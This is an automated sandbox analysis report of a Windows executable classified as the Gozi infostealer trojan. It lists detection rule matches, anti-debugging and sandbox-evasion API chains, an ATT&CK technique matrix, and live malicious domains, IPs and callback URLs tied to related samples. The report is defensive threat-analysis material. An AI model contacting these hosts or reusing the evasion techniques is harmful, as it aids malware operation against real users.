          Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_00401493
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_00401D95 GetProcAddress,NtCreateSection,memset,0_2_00401D95
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_00401F78 NtMapViewOfSection,0_2_00401F78
          Source: d2ef5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: d2ef5.exeReversingLabs: Detection: 88%
          Source: d2ef5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\d2ef5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\d2ef5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@3/1
          Source: C:\Users\user\Desktop\d2ef5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\d2ef5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,0_2_0040134F

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: Yara matchFile source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\d2ef5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\d2ef5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\d2ef5.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_0-476
          Source: C:\Users\user\Desktop\d2ef5.exeAPI call chain: ExitProcess graph end nodegraph_0-469

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\d2ef5.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-476
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,0_2_0040134F
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_00401493
          Source: C:\Users\user\Desktop\d2ef5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_004012B0
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_00401A49

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Windows Management Instrumentation
          Path InterceptionPath Interception1
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          System Time Discovery
          Remote ServicesData from Local SystemExfiltration Over Other Network Medium3
          Non-Application Layer Protocol
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts11
          Native API
          Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
          Software Packing
          LSASS Memory1
          Security Software Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth13
          Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Ingress Tool Transfer
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS114
          System Information Discovery
          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          d2ef5.exe88%ReversingLabsWin32.Infostealer.Gozi
          d2ef5.exe100%AviraTR/Crypt.XPACK.Gen7
          d2ef5.exe100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          0.2.d2ef5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
          0.2.d2ef5.exe.420000.1.unpack100%AviraHEUR/AGEN.1245293Download File
          0.0.d2ef5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          siwdmfkshsgw.com
          194.58.112.174
          truetrue
            unknown
            trackingg-protectioon.cdn1.mozilla.net
            unknown
            unknownfalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.reg.ru/web-sites/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_cmsd2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://www.reg.ru/web-sites/website-builder/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_camd2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://www.reg.ru/domain/new/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_ned2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://reg.rud2ef5.exe, 00000000.00000003.484862658.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://www.reg.ru/support/ssl-sertifikaty/zakaz-ssl-sertifikata/Kak-zakazat-besplatny-SSL-sertifikad2ef5.exe, 00000000.00000003.484845306.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.reg.ru/dedicated/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_serd2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.reg.ru/whois/?check=&dname=siwdmfkshsgw.com&reg_source=parking_autod2ef5.exe, 00000000.00000003.484862658.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://parking.reg.ru/script/get_domain_data?domain_name=siwdmfkshsgw.com&rand=d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://www.reg.ru/hosting/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_host&d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                194.58.112.174
                                siwdmfkshsgw.comRussian Federation
                                197695AS-REGRUtrue
                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:730728
                                Start date and time:2022-10-26 08:28:49 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 5m 30s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:d2ef5.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:7
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@3/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 100% (good quality ratio 100%)
                                • Quality average: 90.4%
                                • Quality standard deviation: 14.5%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 13
                                • Number of non-executed functions: 1
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: d2ef5.exe
                                No simulations
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                194.58.112.174PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                • www.soft-r.pro/dj6o/?4hRHNH=_vWD_btPMP&7ntPW4Ph=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw==
                                PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                • www.soft-r.pro/dj6o/?4hLpJ4=h8dHL&0Pn=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw==
                                IMG_101922.exeGet hashmaliciousBrowse
                                • www.p-2-e.online/ne6z/?3fi=X8e/mG3OgQH2ZIg2u7BGTd4l+Upsli5Mlf6j3FqlKBcy2x/2H6Rt+ba7kOrDGFoWKGudfgElwVoSItje46c3BnECpab7Gcxzsg==&n2MxbD=v4Il9BC
                                transfer copy.exeGet hashmaliciousBrowse
                                • www.soft-r.pro/dj6o/?8pTt=2dw0QdipHhjxnj&eN6ti4=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw==
                                PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                • www.soft-r.pro/dj6o/?7n9l=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDk97DxR8wmX2Uw==&Y8N=TbiXB
                                invoice.exeGet hashmaliciousBrowse
                                • www.soft-r.pro/dj6o/?1bxXd=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw==&Xbo=V2M80V
                                payment.exeGet hashmaliciousBrowse
                                • www.soft-r.pro/dj6o/?8p04_=OZ-HnF&2d=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjnZTB6C38M3x+YGfGOKPkKWLEl
                                invoice.exeGet hashmaliciousBrowse
                                • www.soft-r.pro/dj6o/?7n9pqx=K2Mp5pqx32_lRZL&tVw=vnB24m7zYuqz1tM6+OXGectY250cZexgkvx801FyUM6ApfRgmaMK0bHsyxLM1s80XjTXf2isqV5CX5YJjqjmDhpmcD58xmf+Uw==
                                Baker Hughes Svcs Int LLC Payment Advice.exeGet hashmaliciousBrowse
                                • www.p-2-e.online/n2hm/?-ZVt9=r1QDoJAgKfuxkFSqnZDlAiRC5WFzyLLsX3SfwGdzN7Q5g+5wqSGLqK8itxnUP3tdHKu51MTBAxruHCJ7WSgUG6Mq3w4Iup/Ovg==&D48xa=3fyxUDp8TtM0zt
                                Orden de Compra Urgente.exeGet hashmaliciousBrowse
                                • www.itkonsult.online/de19/?nFN=WN9LRl68T&PfAl=AFsrdKwcRRmPMN5aSvCUFb2HEOv/VuPhU4OrvkpouMCpQ55CENRlKa0frEpJtm9fud2C
                                uuctgqafmcr.exeGet hashmaliciousBrowse
                                • xotravel.ru/123.gif
                                Factura de proforma .pdf.exeGet hashmaliciousBrowse
                                • www.itkonsult.online/de19/?AL38nB7p=AFsrdKwZMWiKOd4gO/CUFb2HEOv/VuPhU4OrvkpouMCpQ55CENRlKa0frHp8xSpkqcbG&6lrx=5jth78
                                kopia p#U0142atno#U015bci.exeGet hashmaliciousBrowse
                                • www.a8-group.com/dwdp/?Ploxn=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1Lr1fJLtOGf09lQ==&b2Mt=Q4SXxN_hK
                                44620.exeGet hashmaliciousBrowse
                                • www.a8-group.com/dwdp/?y8=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM2T7xDX7dGGtQIjzHiNdhx1tRU&yDKTI=PXyxUJshCVDXBZtP
                                0m1W0nDBF5.imgGet hashmaliciousBrowse
                                • www.a8-group.com/dwdp/?7nrhV=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1Lr1fJLtOGf09lQ==&5jk=U2Jpt
                                AnOqqu1435.imgGet hashmaliciousBrowse
                                • www.a8-group.com/dwdp/?-Zn=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1Lr1fJLtOGf09lQ==&DR-P=VXa0gzFpvDy
                                Musterkatalog 2022.pdf.exeGet hashmaliciousBrowse
                                • www.a8-group.com/dwdp/?fZz=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1LtpOX41OHf8llQ==&-Zl=7nH43
                                ML_005446-pdf.scr.exeGet hashmaliciousBrowse
                                • www.upbc.pro/q9dv/?6lvLp05=ePWkxNgVybsDzECChE977MT5Beg3aPaa5L2t9Bnx34sJBbmY7N4/uHMKpWD0ULStAqmuUAgOQYlOWi/Ia96plahWrDMrRQFleA==&1b=8pthLbPHJHkPLPe
                                New Order Pls send me Proforma Invoice.exeGet hashmaliciousBrowse
                                • www.elektri4ka.online/gnhu/?7nxL5F08=Cvk5jRaXpllb/czSQay9vKkOLvIyePmcTXpWSExvE45n2FIIoS64ssUSfn/TzV+f2a9HEDnyPncwIKU7f2cV4f0iKd8X1VJzrw==&W85=R2J8x0y8oPil9p1P
                                Purchase Order.exeGet hashmaliciousBrowse
                                • www.upbc.pro/zu0g/?z2J=fwQr2ldPxgaM89luQHdDPBAdtRIKNg+uxEE517sddcbP4U9oBlmzgGG9zWOfD15sHn/t1t5kZLtyamfF2qiC3naKzCpHJler6g==&OB=nXiXc
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                AS-REGRUCDF77C2AF71C09E830990C14E72B624223094EE4C10B6.exeGet hashmaliciousBrowse
                                • 194.58.112.165
                                test.batGet hashmaliciousBrowse
                                • 194.67.110.215
                                PowerControl_Svc.exe.0.exeGet hashmaliciousBrowse
                                • 37.140.192.211
                                BL-INV-DHL.exeGet hashmaliciousBrowse
                                • 89.108.65.241
                                Service[1].exe.0.exeGet hashmaliciousBrowse
                                • 194.58.108.112
                                DHL-INV-MBV.exeGet hashmaliciousBrowse
                                • 89.108.65.241
                                PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                • 194.58.112.174
                                library_2.exeGet hashmaliciousBrowse
                                • 31.31.196.159
                                jXM9GlGl19.exeGet hashmaliciousBrowse
                                • 31.31.196.159
                                https://protikvpn.site/download.phpGet hashmaliciousBrowse
                                • 31.31.196.139
                                u5evTYONyY.exeGet hashmaliciousBrowse
                                • 31.31.196.159
                                62cHGPXXzW.exeGet hashmaliciousBrowse
                                • 37.140.192.211
                                rwjeqEjx01.exeGet hashmaliciousBrowse
                                • 31.31.196.159
                                PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                • 194.58.112.174
                                AWB#3462686975.xlsGet hashmaliciousBrowse
                                • 194.87.231.59
                                jM4M5ZINEZ.exeGet hashmaliciousBrowse
                                • 31.31.196.159
                                IMG_101922.exeGet hashmaliciousBrowse
                                • 194.58.112.174
                                https://www.mmmd20s.site/?email=smurray@atlas-apex.comGet hashmaliciousBrowse
                                • 31.31.196.229
                                transfer copy.exeGet hashmaliciousBrowse
                                • 194.58.112.174
                                Qh2jNLL1bg.exeGet hashmaliciousBrowse
                                • 31.31.196.159
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.520215470573881
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:d2ef5.exe
                                File size:37888
                                MD5:1d8a445bef0c0d4a7ec519f06c23224a
                                SHA1:7dd349b8664ec7dbe769da64e1b324ae091a29e2
                                SHA256:e807c46ba7cd53bf6900d1a8f32baba9a118410483faa68d51b233de738483e3
